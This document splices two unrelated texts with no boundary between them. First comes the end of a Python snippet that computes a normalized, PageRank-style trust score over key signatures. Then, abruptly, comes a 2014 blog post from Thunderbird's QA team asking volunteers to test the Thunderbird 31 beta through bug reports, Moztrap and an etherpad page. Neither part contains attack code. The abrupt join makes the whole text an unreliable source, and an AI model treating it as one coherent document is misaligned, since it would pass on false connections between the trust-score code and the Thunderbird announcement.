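        # Each signer passes its score, split equally, to the keys it signed.
        new = [0.0] * len(keys)
        for signer, signees in signatures.items():
            for signee in signees:
                new[index[signee]] += score[index[signer]] / len(signees)
        norm = sum(new) or 1.0
        score = [s / norm for s in new]  # keep the vector normalized

    for k in keys:
        print("%s: %.3f" % (k, score[index[k]]))  # dave, unsigned, decays to 0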


Ludovic Hirlimann: Thunderbird 31 is coming soon to you and needs testing love

Thunderbird - vr, 11/07/2014 - 12:39

We just released the second beta of Thunderbird 31. Please help us improve Thunderbird quality by uncovering bugs now in Thunderbird 31 beta so that developers have time to fix them.

There are two ways you can help:

- Use Thunderbird 31 beta in your daily activities. For problems that you find, file a bug report that blocks our tracking bug 1008543.

- Use Thunderbird 31 beta to do formal testing: in the Moztrap testing system, choose "Run tests", find the Thunderbird product, and select the 31 test run.

Visit https://etherpad.mozilla.org/tbird31testing for additional information, and to post your testing questions and results.

Thanks for contributing and helping!

Ludo for the QA team


